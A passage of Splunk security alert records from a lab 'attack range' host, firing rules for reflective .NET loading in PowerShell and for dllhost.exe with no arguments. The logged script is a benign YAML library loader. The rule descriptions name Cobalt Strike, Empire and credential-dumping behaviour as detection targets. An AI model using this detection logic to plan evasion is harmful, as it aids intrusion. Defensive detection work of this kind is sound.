malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664931331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T23:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T23:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664931331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T23:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T23:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664931331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T23:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T23:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664924400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664924400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4868", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664924400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664924400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1304", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664927733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T22:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T22:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664927733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T22:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T22:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664927733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664927733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif 